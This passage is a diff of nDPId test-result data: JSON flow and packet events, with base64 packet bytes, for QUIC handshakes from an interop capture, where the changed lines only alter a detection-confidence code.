-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1603816434648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVWdAAEARtqvAqAGAEr1U9YhXAbsE7B\/jxQoKCgoI8ujrluq3MPgAAETSSw3nndZy2B\/JR\/aFheBm1Am1dhHdGKFX4rQi398jOJ+Jn+ueiHb2+ayhrixzGiiTN9ufhk4Lx76CWjuYMe1esceEF2U0qEsZzm5HKOUSMwSJ5RaG7eBb\/NGtId7Q6oJPV32C4GXJOjD2zUmbaepzk+oaGFaN7rBeaveWtYLwkm3MCtZ9ixGvt1GVcZjsd3UxnGM0OVZjCX0r80DcWyuTZ+venG\/PF8dpMDihqsZpbR3kCGTkK2uMnVKt5rsbq8Q3DZ4G5gYRlETl0tKNNk\/HmutyUjflzkkuvzr4zZfbMn0fPfDD0j7mcNxEYvvd0jng9gG7f2g5c2cWdEOeL32TJuGaUD4LxEgTmtQ74vLlqJ2jtPbB5cHftJfgjUFjPeNm\/TPJhWl+3\/2FaFh7UtvKIQZYWOKggBRpbC9DfYZGBlcBdT4cVCcoYVYvdnofibyJj7qvtk9aBhQ8X8haBJHnwUiu9Fh6LP38l6DOudy0wo3ZglGsYmVQyJ13TOTkHezaV+ftjH2Ic2\/kdq8i3gBc5XmSKkmTiDbR3CJC6bVKLX4YKbycr7PwvmeAgaIww6YUv5UVh+vhnxqslyCYJ54KMPJqDqUt8WhJ8Cyji43HCRRNG5kipptq8jUrAU8gnwzNfotH5yFDF+SAJ3QrzY\/5UXiv\/luWN+jwEASOuxa49aAiqVUa6A2J9z+IULgzW9aUufnh8e6ojNPCROl0NOCqRnl5cZCiCryKj\/+UTBEx39zm8tG1rMtKw8QCLVg0thBdHS0CguNqIcZrFjoob99Ht9nweYVHyIifEGHrneZFx6IaFg2N2+vqZttN1BPnlJwB5SkjsSGnctAq0WWDJg53X0egLh7DxbpeFvo\/PmlH\/qw8mjFt+NYPN0Ckt589t68fWjAbTRqz6xR6iPzgtt26G5g9GSc+owtcPOoKDSY+FtfvQEy2FDAKor8oRuyToRIFoS3GHrsVAzOLHHMrzcmpnrq0hajchpZRX9\/japhKPdmJTqsBb+ql5oZkXtBdENW3VUtixBzrUWiVbOkyqYBTjYwbASaX1s4B0v9Dw3fdaQktg0huYIDe3RIztuWGLVXFqL3kiPstObyRA8wmGdfn5WqodpZ8U9Vfz6QFfvCBcYE1\/TFuOxsVuCGHj1fKdzqDxFgpT\/6zI3IgHHNl0RstA3RkolWL6H0I5f1KqOUjo7bKGh\/fgABUsvMtkL2jljWloerb\/OyZ8cMJbX4NbVoNGdWP6RjJXhmtbLlmGjr\/nG9lw0JPerfXWXztQQ84uR0ZUAsCJbt6PCEcektnL94QlE49op9jLT5v5WzhOshdDsHI9kPLgiBlXhxtuB\/4fh64dFKwIV\/bkeadS+6vx09Jc7DjJDplds16bxuhHniXD1+VLQYqMNvLfkmfXTcvt+DCDI5+MtT64WEYlvBN\/oRfvKNXOlpG0nbSIxax56Y8i7ywQwgVXRD\/tgIY5hSIvokl8C2Vtnw0ocpu1kRHmBam5VO2gvUlslhf1v2Z1lhZ3ZHKYC+go+hJTIN8eMiQlcB94ueuvx1ZXgPZAWpEgcGBa59R7aGipRkAIOU7VFYiFm+JgHn0wlJi1ePUMn2SyyfRo+5s5CeNkA7rfixGxD37LoDcJtDM1uCusOgWzzaoPX\/WMg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434648,"flow_last_seen":1603816434648,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1603816434650,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"thread_ts_msec":1603816434650,"pkt":"PKn0qB\/spJGxgjQ5ht1gDoRdACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVHuNwArYcCQAAAAAAAIF6TDw+yG4BdFR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="} 00644{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1603816434652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434652,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVD8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWsxwRUQTYTRjACgoKCgjaL32MZj\/FsgAARL5kzfCcIzgmsxjP0G4DqL4uwGMN6uFXlzXIqULUmbWkTZimqkIWYk5J+U1Tm2aqd1MjW9rzMqELFmlAhlXckjXGsH+Agbi5yNw7OuSd0A2jkDOUIsWCSOJHKlMr0ObsMh5yal2tl2VuEVfSE0qsFV7WLAeEJZABZmjJDxwfk918siEfP+aSaQvEgBBkJ84hGcxa0pyg3zr9AdvoDzmITNfcVD\/SbxorVKGQTTyoV2KjJ4ODNMmCAzaGCyDD6BHN+TqaVnIG75iUky\/i00OWO2itqTOK5MK0gg\/F4dmZXxYm544SXt3mEIMn\/KiT58TB8AnvvoMM+zDcLjD2voYO7w6nQ7vjIZtfT9m3XWOP8J9F0bvPBS9+vGZTprqiR2e6PBnSg0KmchSjlKU1RP+jKuqXA5YZOjOGqV6O\/fewKbV40io0i1J+NIHqJBZhd5bjjAjtEL0\/jGHCJT8+kHWQVRnVxvJTULFHfSoFaOv0\/FAPPgQmAsV\/e7ePRse7PiP7AO9qzUpNTBIaRi7R7yEx60bIoFeYOSNhxPoca1fCTIiqpbf\/Lysq6HvKKUzNT0W7O4lfkb\/ZC1VhUlt7Od+qJCiRwXxU9D\/42IwUin8sjlUvg+KRX5ulSQOPGOYufZ92sil2AWQyHIIFULLz407V9+RW+9E6Q7FjwFkZOFtY3aV1T\/8FTKaaOHGLazcJjKUaGZC8AA2F6I9PGcFFC9RAXizVtqzUQ+iviDhJ+goUzdUB1agAa\/MIn7DGkbkQVOtD+1M6CKkE7hHdmiQ9n16NW3fCjz4YqlEqNM80RgogewW7AOxtVLzwj56n0cG2wRWB+HawQfkQIDtIJqSHPWB9OkV6tfXkJfbT2wlbh\/rfKSskLrk1sbYzY1PIDNmPjLRCZBVWmCYLPffYkG+b4MwNHB\/vAIrvElJ1puJF7jpzzegk3uRCXIKeAvnSIueoT+dVtLnf0DjT1SjmwFUtovRpxxTHtgK78PEBaNK+CFnXBiyxXF88QJhaPeav6oIj92LBjRUaBtpFYrGT7ukwX0CZJH6ss8DKRBYG8o1LXxAiSMdCM85xU\/D1l5JAQtiGzlNDH3qXy62dPdPRzmBTdsEvCTu1SJ4aTQ5HqZkZ8mdXkv1vSCrhXtjNjyM9ISkMXQl7Fv4snypY5dWEXtwWFf\/DXWrXLzy8bkZnUz7iRb5Ma6ol5Xky3YnWYit6Oy8bYeuXHVcQl7yxHmQFX9vlhcsmh3du6Au3WEc7fVr5+pChwI9eXXokYUBC373Pa\/y2+Tfslyg9\/dYBdfu3HiD4BKHBgCptEzxjJJoRocgeQEgIyTxnLazyy7tsTNsUIYjWNFhWoL2xJFntqowob7P44+WFAm6ZkZovEYYNmSKqBxSG9wAPXekCbXtH\/b+TOIK9+1XfTT1IrbkxQYHWASoekr6WZeU4jYlWrrn8X8ujjTBW3jswDbT7J2Z+rUudTp2RtVzFLtpsMRieCSQBEact92jCCupbg43ThfRz5r1sA\/97BYUtprJqYvONm9iufuMRRuGLpd5h9EBpE9lEEKcLT0QIsIjALGWNfhWnZdIJLXqAQgypProR3AsmTwuLfn7lEfngyfzJ6wUdezbTEtlDAdR3wg=="} -01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01037{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434652,"flow_last_seen":1603816434652,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434652,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.tech","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1603816434656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434656,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgNAAEARiNrAqAGAhfLO9LMfEVIE7Eh3wgoKCgoIJ05Q063kdsUAAETSbLaK1YIdjfFKFulEh8Y2sf\/rINJYpnSz+n\/2QdD9ZhLptcSvy2R2VY8k3My6fIvL6mAk+uMpn4smDS1KptYa2flod7AFdpBN3VvGtMn8LYTKEkOwUsRO7TdqEPawLRWOABxPUqjQjdCeFgLJNdZk5RA07LTgVWI2Yu12LDx4casOusyaOV0FFb2psXZWvD\/rRGJTjSUwimMA87gUlPjAdz\/gfYKA8J81JCdeNyPB5kQpQZK9Ag3U\/SNi8mmglOJkOcsW2kP9tVz80xUx+vHEMYcRJEAektIaWVqW\/qsi2o67TUfHR2EXa8XSNf6EPfTjaOmRYh3mFcNDcJgd2kz2KAnh3V0gkKSqu2uEJA5\/mg\/TnJn0\/l1UAulF72+p5R9Pa32JoZ5rRGN1BakDzPrffOR0TvFE3y\/+FghM6Dz\/8uzCybhNc7sfFp+p4ZUoUBdN3i5d0NPyFY2gHyQomOn9rjU73nYYIseeZ+nhRO7YbCjkbUB\/yYwkJmFOh0TvqwzYznQgk7lfr\/md+bsxGFCUVM4aVxtYqCyilzNHjx2\/0uQ9PwLviLCGbf\/DMQiUcVNp3cYBqz7DJUy+OlRTk8hlbBxWecwj0pbXbnMQduOagYXqgiomaGUVKDGlda0JCfvvNO757eKuRy0mLdjIpqHD1NEufFqbaSMZUn9grkimQ69ppIErnAUuDQMJRIyzqNcJHugVGEq5oP7QdlfZ7lr3jOBT7HkZcNEd8AV47qJgoKU5q4NGc0J71Pw2YVYd1scb3A1vWRIVsIkczT7yuDAKiAClVSuNQLnIvJw4l6s7CUlk6S8uK69+4Ltr75BolBxMCVoHkM5b\/orqVfR0OqNi+hCYxsYJghq7xN9bXvYCpq2kqvymjFiL1hosZ8LqBqlbZ+KRpjwV61KCcoVqNasJru7kBOCt\/mWTssvQAORaUq8Mlwn9y2PykyJGeVKaSASOiRacPdV4HuhCOQcDfRB9yNMfMAnpvVeDH6VS7MdAdMQe93Qrtp1QeP8VO2rTCCN91AOit2V+QXCvc+BbYXTvvH3JkKThYqcH8rRbxqdDTPq\/wWim7\/0lqkWBCggizFSqTrUIDXVpjQPuUhy\/WRzxkYSIc7u5fZ6sIq5eN5m9fXx2vD43Yq+l1Ghb4xvwIneJ5NUn2eFk1R6ttVwWQjusN7oyMgG5gj6hjohBbMiM6VLvBdJqqabe+fqfPuIkbGqi\/pSgVmd7J7gTSQs7\/paaiImg8sm4Mq97uvoFIBYp8yYjmKJB82W7bOZiqV49vTn0RrZTlVVPlHFQX2WpjZTpwwz0jIKKplJsVkyi1FG+BOFx+GyxlIihWz4PLKtSgOENeMXtz0\/b7SoSYOWhsCG2\/\/f948c1r4PeUvRu7XqduuojNmHxpahHKwAwVmNhkRHsAbP5zW9qP6XfWnsVWmx0bN7aP5npP3hrOKyfrsV\/5FkNliWd9jR5UNuOo4OtgXCghNfW4LyOPBq4jsogY2TorxYEYK\/ICauhkE1t2zAYwcvA9jNm0x1R4D\/Sm+97z\/rPAGHRZcrG9A3EB6U09uwydYieU6kZpUiZJOYWACk9HUxtfhKSNARDjWcNCzM7bpArmDYB3hnejZrmrPbFxj58+oKmg6IVgKVFjNIQGjV1OHopPg=="} -01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434656,"flow_last_seen":1603816434656,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434656,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1603816434657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434657,"pkt":"pJGxgjQ5PKn0qB\/sht1gCNHwBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYQzDKCgoKCgjBjvWe+MPFRAAARL4g348kA8mQBcAOi\/Ea5lVgGbx\/7eo9z03nW8pQoHBEiVFxap\/J7yF0T4ETOiXRrEVFzfKu4cp9\/aIHD8VuqdmnRI7ZUzH6nHP6t6XgWjPLu9gwncGiNpy\/62Nk4XPzeji4OQEhiV2wvPwilhPjz1Iw8tA6gxIE\/FJ4VwrM+jhjDDGeJX9BSVBF51kNOZwIfVwErkoa\/qCvtHlDAlGsd67naWgwRHPQ1nkSJwo+9sQMQloIehnYy66qr7McaNefwAbFS5vujjFD0bYEmGDHKA\/F\/y+3qGlJupB5YPSp8wB7Am1v5JD+D\/bG5B5luaL\/5MF\/tQnBG2dxtea8LZG5G\/eV6LyP9L4ooo4IJyvTlEaQ\/ZOeKwlHxchtWnc9B1fL75AWTflk927t027mF4gEUpMwkx4RQMESzJeKbiKyR6Kju8+GylIujiTUOWwe8Pt6FKBiAZLgvlK4YR6upjyxAj1yifEMXI9ck\/VO\/Ck0PU3TrRtvDl\/wfNsVtESwzsMNhYfkwDEb9HKwo5a2\/kMDB2oZkX2VNVeOAH0n3s8tB9WLVe8oKkFTUmog+0QRsMIpnLCWQ75LQKoJv6O1XJQVMkvkriwokuRy8CCP4EpIlVSvXuFArfX\/fbTPCluQ1NH50zOP6ysMQboAYq5P1UCN4zcLGWZaVbF9oa1jAJ6PadCu1EtWpxyNeTUpAe5jtCvh1Ek99dEg6bQ+j6gvn\/Yz8AhHWVisS\/4VPgx2sHYS2FDc4ug9W6gsAFExY3uSitd7XjxK\/bL1oNU+b0jZOhnX4xE5mnhbxzHNAKXSXB2aWDY3+BQWmASrCC3UyA8\/hE91TFVnfAmnegiopiURKjvi8DWlsXJi98UivPepk1KIUkyuwYljhDbFg+Ju8PdCQIp1RdqDT1rPQsla4QcsyF\/NLkn03\/oiCiTPViBgeLpx5IDNsz\/E5PKe7HtjsCqTGdF3JcVQGRMcs6XuK6eeXR39paD1+Ap5R7y4jtTYGF3ERVJnfLPi0OImMpLV78BBWUIiuk57yx\/ByVw1Vi231q0R5hJu+2UkRPleoRsn22QwOy5Wyt6YCa9Njzu+jmkM5SaTLiDskQIXBb6CNyIxDTqisRatDtzI4tGgpDJJrJLyZRRjwm4IUGl4MEcnCWz9P+nJkKiW91BFFECvItcE6tRgENAP6B07ROBWB4xJBDVhnX0WgQS8bETOrbEby5WFiD92Zha2iJfBanxLrhkMlyxfJQvY++OklEMvIXt3v8l2q3dZWFOn4kyWKCN09iij0w0AEDsYLWJZuX4Wd4BeQXUc0TQSuDLkBeoncn1cOIA9nbBX5JYvyr8xLwXYv1YbXFHRI\/Z6kEVdG+BSe850euHBVqJOat4IdCKJnu6NuFXRzdJnMp9gCv2PvmYfbsW9v5iJpCEm0G5joiY+1mWnVbfZAO5JyrBGv3ibTwQYFw\/SIY85UIif3wl0VVblUQH81ysGAOBc9Qkl\/ZLs9Nmdqg326DSTscTecRmY2x8\/F6T2e\/IU6BMaPO19yi\/FICyG9IeO7SjydAWQ627DK5c9b4kcDrf56O+pK9aBvIiTOBgdfw7wCNgDwIOMnK6gKccj4qLA25Wlz7z4n6yBivDMYJeK5g=="} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1603816434659,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434659,"pkt":"pJGxgjQ5PKn0qB\/sht1gA8OgBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmtREBuwTYsN\/CCgoKCgj6DPHJWWs8sAAARL55hiYulShwyIvWIzeLs9lbgr6rmw2K6C37PVfcJZDvZCsi+yJ6TesBrbkUmHPBfXK2VSsq+4q1cI5h2aHxdCKt9ff4StlBulmgH+Bx3V5qJpzO+chyDdznTZrYqtjC6v8ZBmqg6a0NWZctg5sOGc0dmWqWQt\/s1k80Opf4xkQymFAPA9Pl4JS9+iEpGVBaepowwgfscg0eVp\/g4KhRhi2KxzLJD4JVToYgB90k\/XMf5w3IY1+ur6LCGNOvp5CgM1wSVcjlTXRfF2sQ8Nt5yAOXsMdlE2VREtX+yKxHSfWv2qqrbcbq6RVZYdc+ds1nkWyZ\/6jdHbCssoBrfhArvTqJ3nXGeMUG+bKJ8FrC+4G2Lxo3r7Ru71nKnVeUZu9UYw31AJEBbUWJ15R3KR8bSsgXVEA1WA99CJtgXyQXqZETvNqqmNWotKljKjV7OgVyrLmK286tZpqcji\/W3bv\/Ubygl\/yKnAKUAdc0UtIijMu1BloVA+m4PWftVJgbHf3aNTI+rX\/vVy3nXb0QxfA9y88X4009Gs60l0v0MkyueqKT84n5UNIPGZG6kKOK4w37tFYHam4lcYFhUTipTGlChqgi7Rf4rTS7tAG+8PbEvTqHal3HPtJlWvTM+HbREgYOOX+JhiQqeFaskCeQtAFZK2PQl21O\/xEnuuZnwPjd1JkjtwZsem8bzkoeN4610EXK0Ys8ust+NXwAs0bP\/var5LJYH9Np4yVLvPxPvG8XuijcEgZh9Ws\/PfZ9C625UJ6lCdqn5BKdsrwhiY3rVJi0Gb3BXOKIhsyD2r8TfRwv9Zq4BaDAYzj42tlUE3f\/S15wR2pPt+JBRpoPkMMI+gDAQhJn8p8DcnyFkIppSWC9eOywndfHU5\/yUdNXRQwe9qMMJPyoMAFljWxrTTkdBf9XHdyCG0LJ82SE2TMNyUEKoTvtO+s6V45sw4+vLlhHFWzUFy2TDAYLwJNFtU2MgtRT5uCj687n1bMGAYODqCavE72METWdUVuP7KQCk+xmcSAjbR9cQdf0Ld5yf6144baG7pSmrNRAZds9af9ka\/SYB65ZE7zkDGunpr